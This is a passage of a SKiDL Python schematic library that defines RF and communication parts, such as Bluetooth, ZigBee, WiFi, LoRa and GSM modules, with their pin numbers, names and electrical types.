SKIDL_lib_version = '0.0.1'
rfcom = SchLib(tool=SKIDL).add_parts(*[
Part(name='BL652',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth Nordic nRF52',description='Bluetooth module',ref_prefix='U',num_units=1,fplist=['Laird*BL652*'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='SIO_24',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='SIO_23',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='SIO_22',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='SWDIO',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='SWDCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='SIO_21',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='SIO_20',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='SIO_18',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='SIO_16',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='SIO_05/AIN3',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='SIO_17',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='SIO_14',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='SIO_04/AIN2',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='SIO_19',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='SIO_12',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='SIO_03/AIN1',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='SIO_31/AIN7',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='SIO_11',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='SIO_02/AIN0',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='SIO_30/AIN6',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='SIO_10/NFC2',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='SIO_01',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='SIO_29/AIN5',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='SIO_09/NFC1',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='SIO_00',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='SIO_28/AIN4',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='36',name='SIO_27',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='SIO_08',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='37',name='SIO_26',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='SIO_07',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='SIO_13',func=Pin.BIDIR,do_erc=True),
Pin(num='38',name='SIO_25',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='SIO_06',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='SIO_15',func=Pin.BIDIR,do_erc=True),
Pin(num='39',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='BTM112',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth BT SPP Module',description='Bluetooth SPP Module, UART, Class 2',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='PIO8',func=Pin.BIDIR,do_erc=True),
Pin(num='2',name='PIO9',func=Pin.BIDIR,do_erc=True),
Pin(num='3',name='PIO10',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='AIO0',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='AIO1',func=Pin.PASSIVE,do_erc=True),
Pin(num='6',name='RESET',do_erc=True),
Pin(num='7',name='SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='8',name='~SPI_CSB~',do_erc=True),
Pin(num='9',name='SPI_CLK',do_erc=True),
Pin(num='10',name='SPI_MOSI',do_erc=True),
Pin(num='20',name='PCM_IN',do_erc=True),
Pin(num='30',name='PIO1',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='~UART_CTS',do_erc=True),
Pin(num='21',name='PCM_CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='PIO0',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='UART_TX',func=Pin.OUTPUT,do_erc=True),
Pin(num='22',name='USB_D+',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='~UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='23',name='USB_D-',func=Pin.BIDIR,do_erc=True),
Pin(num='33',name='RF',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='UART_RX',do_erc=True),
Pin(num='24',name='~LINK~/PIO7',func=Pin.BIDIR,do_erc=True),
Pin(num='34',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='PIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='CONN/PIO6',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='PIO5',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='BTN/PIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='PCM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='28',name='PIO3',func=Pin.BIDIR,do_erc=True),
Pin(num='19',name='PCM_SYNC',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='PIO2',func=Pin.BIDIR,do_erc=True)]),
Part(name='BTM222',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth BT SPP Module',description='Bluetooth SPP Module, UART, Class 1',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='PVCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='AIO0/SLEEPCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='AIO1',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='PIO0/RXEN',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='PIO1/TXEN',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='PIO2/USB_PU/CLK_REQ_OUT',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='PIO3/USB_WKUP/CLK_REQ_IN',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='PIO4/USB_ON/BT_PRIOR',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='20',name='USB_D+',func=Pin.BIDIR,do_erc=True),
Pin(num='30',name='UART_CTS',do_erc=True),
Pin(num='11',name='PIO5/USB_DETACH/BT_ACT',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='USB_D-',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='SPI_MOSI',do_erc=True),
Pin(num='12',name='PIO6/CLK_REQ/WAN_ACT',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='PCM_SYNC',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='~SPI_CSB~',do_erc=True),
Pin(num='13',name='PIO7',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='PCM_IN',do_erc=True),
Pin(num='33',name='SPI_CLK',do_erc=True),
Pin(num='14',name='PIO8',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='PCM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='34',name='SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='15',name='PIO9',func=Pin.BIDIR,do_erc=True),
Pin(num='25',name='PCM_CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='35',name='PIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='~RESET~',do_erc=True),
Pin(num='26',name='UART_RX',do_erc=True),
Pin(num='36',name='PIO10',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='27',name='UART_TX',func=Pin.OUTPUT,do_erc=True),
Pin(num='37',name='RF',func=Pin.PASSIVE,do_erc=True),
Pin(num='18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='28',name='UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='38',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='CC1000',dest=TEMPLATE,tool=SKIDL,keywords='Low Power RF Transciever',description='Single Chip Low Power RF Transceiver, TSSOP28',ref_prefix='U',num_units=1,fplist=['TSSOP*'],do_erc=True,pins=[
Pin(num='1',name='AVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='RF_IN',func=Pin.PASSIVE,do_erc=True),
Pin(num='4',name='RF_OUT',func=Pin.PASSIVE,do_erc=True),
Pin(num='5',name='AVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='7',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='AVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='10',name='L1',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='DGND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='L2',func=Pin.PASSIVE,do_erc=True),
Pin(num='21',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='CHP_OUT',func=Pin.PASSIVE,do_erc=True),
Pin(num='22',name='DGND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='R_BIAS',func=Pin.PASSIVE,do_erc=True),
Pin(num='23',name='DIO',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='24',name='DCLK',func=Pin.OUTPUT,do_erc=True),
Pin(num='15',name='AVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='25',name='PCLK',do_erc=True),
Pin(num='16',name='AGND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='PDATA',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='XOSC_Q2',func=Pin.PASSIVE,do_erc=True),
Pin(num='27',name='PALE',do_erc=True),
Pin(num='18',name='XOSC_Q1',func=Pin.PASSIVE,do_erc=True),
Pin(num='28',name='RSSI/IF',func=Pin.PASSIVE,do_erc=True),
Pin(num='19',name='AGND',func=Pin.PWRIN,do_erc=True)]),
Part(name='CC1200',dest=TEMPLATE,tool=SKIDL,keywords='RF Tx Rx',description='Low-Power, High-Performance RF Transceiver',ref_prefix='U',num_units=1,fplist=['QFN-32-1EP_5x5mm_Pitch0.5mm', 'QFN-32-1EP_5x5mm_Pitch0.5mm*'],do_erc=True,pins=[
Pin(num='1',name='VDD_GUARD',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='~RESET~',do_erc=True),
Pin(num='3',name='GPIO3',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='GPIO2',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='6',name='DCPL',func=Pin.PWROUT,do_erc=True),
Pin(num='7',name='SI',do_erc=True),
Pin(num='8',name='SCLK',do_erc=True),
Pin(num='9',name='SO(GPIO1)',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='GPIO0',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='LNA_N',func=Pin.PASSIVE,do_erc=True),
Pin(num='30',name='XOSC_Q1',func=Pin.PASSIVE,do_erc=True),
Pin(num='11',name='~CS~',do_erc=True),
Pin(num='21',name='DCPL_VCO',func=Pin.PWROUT,do_erc=True),
Pin(num='31',name='XOSC_Q2',func=Pin.PASSIVE,do_erc=True),
Pin(num='12',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='AVDD_SYNTH1',func=Pin.PWRIN,do_erc=True),
Pin(num='32',name='EXT_XOSC',do_erc=True),
Pin(num='13',name='AVDD_IF',func=Pin.PWRIN,do_erc=True),
Pin(num='23',name='LPF0',func=Pin.PASSIVE,do_erc=True),
Pin(num='33',name='GND_EP',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='RBIAS',func=Pin.PASSIVE,do_erc=True),
Pin(num='24',name='LPF1',func=Pin.PASSIVE,do_erc=True),
Pin(num='15',name='AVDD_RF',func=Pin.PWRIN,do_erc=True),
Pin(num='25',name='AVDD_PFD_CHP',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='DCPL_PFD_CHP',func=Pin.PWROUT,do_erc=True),
Pin(num='17',name='PA',func=Pin.PASSIVE,do_erc=True),
Pin(num='27',name='AVDD_SYNTH2',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='TRX_SW',func=Pin.PASSIVE,do_erc=True),
Pin(num='28',name='AVDD_XOSC',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='LNA_P',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='DCPL_XOSC',func=Pin.PWROUT,do_erc=True)]),
Part(name='CC2520',dest=TEMPLATE,tool=SKIDL,keywords='2.4GHz rf transceiver ZigBee 802.15.4',description='2.4 GHz ZigBee/IEEE 802.15.4 RF transceiver',ref_prefix='U',num_units=1,fplist=['*QFN*28*5x5mm*Pitch0.5mm*'],do_erc=True,pins=[
Pin(num='1',name='SO',func=Pin.OUTPUT,do_erc=True),
Pin(num='2',name='SI',do_erc=True),
Pin(num='3',name='~CS',do_erc=True),
Pin(num='4',name='GPIO5',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='GPIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='6',name='GPIO3',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='GPIO2',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='DVDD',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='GPIO1',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='GPIO0',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='AVDD1',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='AVDD5',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='12',name='XOSC_Q2',func=Pin.PASSIVE,do_erc=True),
Pin(num='22',name='AVDD4',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='XOSC_Q1',func=Pin.PASSIVE,do_erc=True),
Pin(num='23',name='RBIAS',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='AVDD3',func=Pin.PWRIN,do_erc=True),
Pin(num='24',name='AVDD_GUARD',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='NC',func=Pin.NOCONNECT,do_erc=True),
Pin(num='25',name='~RESET',do_erc=True),
Pin(num='16',name='AVDD2',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='VREG_EN',do_erc=True),
Pin(num='17',name='RF_P',func=Pin.PASSIVE,do_erc=True),
Pin(num='27',name='DCOUPL',func=Pin.PASSIVE,do_erc=True),
Pin(num='28',name='SCLK',do_erc=True),
Pin(num='19',name='RF_N',func=Pin.PASSIVE,do_erc=True),
Pin(num='29',name='AGND',func=Pin.PWRIN,do_erc=True)]),
Part(name='HF-A11-SMT',dest=TEMPLATE,tool=SKIDL,keywords='WiFi IEEE802.11 b/g/n',description='WiFi IEEE802.11b/g/n with Ethernet Module, UART, GPIO',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='3.3V',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='3.3V',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='4',name='UART_TXD',func=Pin.OUTPUT,do_erc=True),
Pin(num='5',name='UART_RXD',do_erc=True),
Pin(num='6',name='UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='7',name='UART_CTS',do_erc=True),
Pin(num='8',name='TX+',func=Pin.PASSIVE,do_erc=True),
Pin(num='9',name='TX-',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='RX+',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='RX-',func=Pin.PASSIVE,do_erc=True),
Pin(num='21',name='UART1_RXD',do_erc=True),
Pin(num='22',name='UART1_TXD',func=Pin.OUTPUT,do_erc=True),
Pin(num='23',name='1.8VOUT',func=Pin.PWROUT,do_erc=True),
Pin(num='14',name='~LINK~',func=Pin.OUTPUT,do_erc=True),
Pin(num='24',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='~RESET~',do_erc=True),
Pin(num='25',name='RF',func=Pin.PASSIVE,do_erc=True),
Pin(num='16',name='~READY~',func=Pin.OUTPUT,do_erc=True),
Pin(num='26',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='17',name='~RELOAD~',do_erc=True),
Pin(num='18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='MM002',dest=TEMPLATE,tool=SKIDL,keywords='IOT LoRa SIGFOX',description='NEMEUS Modem dual-mode LoRa/SIGFOX',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='~NRST',do_erc=True),
Pin(num='3',name='PB9-IO/I2C-SDA',func=Pin.BIDIR,do_erc=True),
Pin(num='4',name='PB8-IO/I2C-SCL',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='BOOT',do_erc=True),
Pin(num='6',name='PB7-IO/UART1-RX',func=Pin.BIDIR,do_erc=True),
Pin(num='7',name='PB6-IO/UART1-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='PB4-IO/NJTRST',do_erc=True),
Pin(num='9',name='PB3-IO/JTDO',func=Pin.BIDIR,do_erc=True),
Pin(num='10',name='PA15-IO/JTDI',func=Pin.BIDIR,do_erc=True),
Pin(num='20',name='PA5-IO/SPI-SCK',func=Pin.BIDIR,do_erc=True),
Pin(num='11',name='PA14-IO/JTCK/SWCLK',func=Pin.BIDIR,do_erc=True),
Pin(num='21',name='PA6-IO/SPI-MISO',func=Pin.BIDIR,do_erc=True),
Pin(num='12',name='PA13-IO/JTMS/SWDAT',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='PA4-IO/SPI-NSS',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='PA12-IO/UART1-RTS/USB-DP',func=Pin.BIDIR,do_erc=True),
Pin(num='23',name='PA3-IO/ADC/UART2-RX',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='PA11-IO/UART1-CTS/USB-DM',func=Pin.BIDIR,do_erc=True),
Pin(num='24',name='PA2-IO/ADC/UART2-TX',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='25',name='PA0-IO/ADC/UART2-CTS/WKUP',func=Pin.BIDIR,do_erc=True),
Pin(num='16',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='26',name='PA1-IO/ADC/UART2-RTS',func=Pin.BIDIR,do_erc=True),
Pin(num='17',name='ANT',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='28',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='PA7-IO/SPI-MOSI',func=Pin.BIDIR,do_erc=True)]),
Part(name='NRF24L01',dest=TEMPLATE,tool=SKIDL,keywords='Low Power RF Transciever',description='nRF24L01+, Ultra low power 2.4GHz RF Transceiver, QFN20 4x4mm',ref_prefix='U',num_units=1,fplist=['QFN*4x4*0.5mm*'],do_erc=True,aliases=['nRF24L01P'],pins=[
Pin(num='1',name='CE',do_erc=True),
Pin(num='2',name='CSN',do_erc=True),
Pin(num='3',name='SCK',do_erc=True),
Pin(num='4',name='MOSI',do_erc=True),
Pin(num='5',name='MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='6',name='IRQ',func=Pin.OUTPUT,do_erc=True),
Pin(num='7',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='8',name='VSS',func=Pin.PWRIN,do_erc=True),
Pin(num='9',name='XC2',func=Pin.PASSIVE,do_erc=True),
Pin(num='10',name='XC1',func=Pin.PASSIVE,do_erc=True),
Pin(num='20',name='VSS',func=Pin.PWRIN,do_erc=True),
Pin(num='11',name='VDD_PA',func=Pin.PWROUT,do_erc=True),
Pin(num='12',name='ANT1',func=Pin.PASSIVE,do_erc=True),
Pin(num='13',name='ANT2',func=Pin.PASSIVE,do_erc=True),
Pin(num='14',name='VSS',func=Pin.PWRIN,do_erc=True),
Pin(num='15',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='16',name='IREF',func=Pin.PASSIVE,do_erc=True),
Pin(num='17',name='VSS',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='DVDD',func=Pin.PWROUT,do_erc=True)]),
Part(name='NRF24L01_Breakout',dest=TEMPLATE,tool=SKIDL,keywords='Low Power RF Transciever breakout carrier',description='Ultra low power 2.4GHz RF Transceiver, Carrier PCB',ref_prefix='U',num_units=1,fplist=['nRF24L01*Breakout*'],do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='VCC',func=Pin.PWRIN,do_erc=True),
Pin(num='3',name='CE',do_erc=True),
Pin(num='4',name='~CSN',do_erc=True),
Pin(num='5',name='SCK',do_erc=True),
Pin(num='6',name='MOSI',do_erc=True),
Pin(num='7',name='MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='8',name='IRQ',func=Pin.OUTPUT,do_erc=True)]),
Part(name='RN42',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth Module',description='Class 2 Bluetooth Module with on-board antenna',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='SPI_MOSI',do_erc=True),
Pin(num='3',name='GPIO6',do_erc=True),
Pin(num='4',name='GPIO7',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='RESET',do_erc=True),
Pin(num='6',name='SPI_CLK',do_erc=True),
Pin(num='7',name='PCM_CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='PCM_SYNC',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='PCM_IN',do_erc=True),
Pin(num='10',name='PCM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='20',name='GPIO3',do_erc=True),
Pin(num='30',name='AIO0',do_erc=True),
Pin(num='11',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='GPIO5',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='GPIO8',func=Pin.OUTPUT,do_erc=True),
Pin(num='12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='GPIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GPIO9',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='UART_RX',do_erc=True),
Pin(num='23',name='SPI_CSB',do_erc=True),
Pin(num='33',name='GPIO10',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='UART_TX',func=Pin.OUTPUT,do_erc=True),
Pin(num='24',name='SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='34',name='GPIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='35',name='AIO1',do_erc=True),
Pin(num='16',name='UART_CTS',do_erc=True),
Pin(num='36',name='SHIELD',do_erc=True),
Pin(num='17',name='USB_D+',func=Pin.BIDIR,do_erc=True),
Pin(num='18',name='USB_D-',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='GPIO2',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='RN42N',dest=TEMPLATE,tool=SKIDL,keywords='Bluetooth Module',description='Class 2 Bluetooth Module without antenna',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='2',name='SPI_MOSI',do_erc=True),
Pin(num='3',name='GPIO6',do_erc=True),
Pin(num='4',name='GPIO7',func=Pin.BIDIR,do_erc=True),
Pin(num='5',name='RESET',do_erc=True),
Pin(num='6',name='SPI_CLK',do_erc=True),
Pin(num='7',name='PCM_CLK',func=Pin.BIDIR,do_erc=True),
Pin(num='8',name='PCM_SYNC',func=Pin.BIDIR,do_erc=True),
Pin(num='9',name='PCM_IN',do_erc=True),
Pin(num='10',name='PCM_OUT',func=Pin.OUTPUT,do_erc=True),
Pin(num='20',name='GPIO3',do_erc=True),
Pin(num='30',name='AIO0',do_erc=True),
Pin(num='11',name='VDD',func=Pin.PWRIN,do_erc=True),
Pin(num='21',name='GPIO5',func=Pin.BIDIR,do_erc=True),
Pin(num='31',name='GPIO8',func=Pin.OUTPUT,do_erc=True),
Pin(num='12',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='22',name='GPIO4',func=Pin.BIDIR,do_erc=True),
Pin(num='32',name='GPIO9',func=Pin.BIDIR,do_erc=True),
Pin(num='13',name='UART_RX',do_erc=True),
Pin(num='23',name='SPI_CSB',do_erc=True),
Pin(num='33',name='GPIO10',func=Pin.BIDIR,do_erc=True),
Pin(num='14',name='UART_TX',func=Pin.OUTPUT,do_erc=True),
Pin(num='24',name='SPI_MISO',func=Pin.OUTPUT,do_erc=True),
Pin(num='34',name='GPIO11',func=Pin.BIDIR,do_erc=True),
Pin(num='15',name='UART_RTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='25',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='35',name='AIO1',do_erc=True),
Pin(num='16',name='UART_CTS',do_erc=True),
Pin(num='26',name='RF_ANT',func=Pin.BIDIR,do_erc=True),
Pin(num='36',name='SHIELD',do_erc=True),
Pin(num='17',name='USB_D+',func=Pin.BIDIR,do_erc=True),
Pin(num='27',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='18',name='USB_D-',func=Pin.BIDIR,do_erc=True),
Pin(num='28',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='19',name='GPIO2',func=Pin.BIDIR,do_erc=True),
Pin(num='29',name='GND',func=Pin.PWRIN,do_erc=True)]),
Part(name='SA605D',dest=TEMPLATE,tool=SKIDL,do_erc=True),
Part(name='SIM900',dest=TEMPLATE,tool=SKIDL,keywords='GSM GPRS Quad-Band SMS FAX',description='GSM Quad-Band Communication Module, GPRS, Audio Engine, AT Command Set',ref_prefix='U',num_units=1,do_erc=True,pins=[
Pin(num='1',name='PWRKEY',func=Pin.PASSIVE,do_erc=True),
Pin(num='2',name='PWRKEY_OUT',func=Pin.PASSIVE,do_erc=True),
Pin(num='3',name='DTR',func=Pin.OUTPUT,do_erc=True),
Pin(num='4',name='RI',func=Pin.OUTPUT,do_erc=True),
Pin(num='5',name='DCD',func=Pin.OUTPUT,do_erc=True),
Pin(num='6',name='DSR',func=Pin.OUTPUT,do_erc=True),
Pin(num='7',name='CTS',func=Pin.OUTPUT,do_erc=True),
Pin(num='8',name='RTS',do_erc=True),
Pin(num='9',name='TXD',func=Pin.OUTPUT,do_erc=True),
Pin(num='10',name='RXD',do_erc=True),
Pin(num='20',name='MIC_N',func=Pin.PASSIVE,do_erc=True),
Pin(num='30',name='SIM_VDD',func=Pin.PWROUT,do_erc=True),
Pin(num='40',name='GPIO1/KBR4',func=Pin.BIDIR,do_erc=True),
Pin(num='50',name='GPIO9/KBC1',func=Pin.BIDIR,do_erc=True),
Pin(num='60',name='RF_ANT',func=Pin.PASSIVE,do_erc=True),
Pin(num='11',name='DS_CLK',func=Pin.OUTPUT,do_erc=True),
Pin(num='21',name='SPK_P',func=Pin.PASSIVE,do_erc=True),
Pin(num='31',name='SIM_DATA',func=Pin.BIDIR,do_erc=True),
Pin(num='41',name='GPIO2/KBR3',func=Pin.BIDIR,do_erc=True),
Pin(num='51',name='GPIO10/KBC0',func=Pin.BIDIR,do_erc=True),
Pin(num='61',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='12',name='DS_DTA',func=Pin.BIDIR,do_erc=True),
Pin(num='22',name='SPK_N',func=Pin.PASSIVE,do_erc=True),
Pin(num='32',name='SIM_CLK',func=Pin.OUTPUT,do_erc=True),
Pin(num='42',name='GPIO3/KBR2',func=Pin.BIDIR,do_erc=True),
Pin(num='52',name='NETLIGHT',func=Pin.PASSIVE,do_erc=True),
Pin(num='62',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='13',name='DS_D/C',func=Pin.OUTPUT,do_erc=True),
Pin(num='23',name='LINE_R',func=Pin.PASSIVE,do_erc=True),
Pin(num='33',name='SIM_RST',func=Pin.OUTPUT,do_erc=True),
Pin(num='43',name='GPIO4/KBR1',func=Pin.BIDIR,do_erc=True),
Pin(num='53',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='63',name='GND',func=Pin.PWRIN,do_erc=True),
Pin(num='14',name='DS_CS',func=Pin.OUTPUT,do_erc=True),
Pin(num='24',name='LINE_L',func=Pin.PASSIVE,do_erc=True),
Pin(num='34',name='SIM_PRESENCE',func=Pin.OUTPUT,do_erc=True),
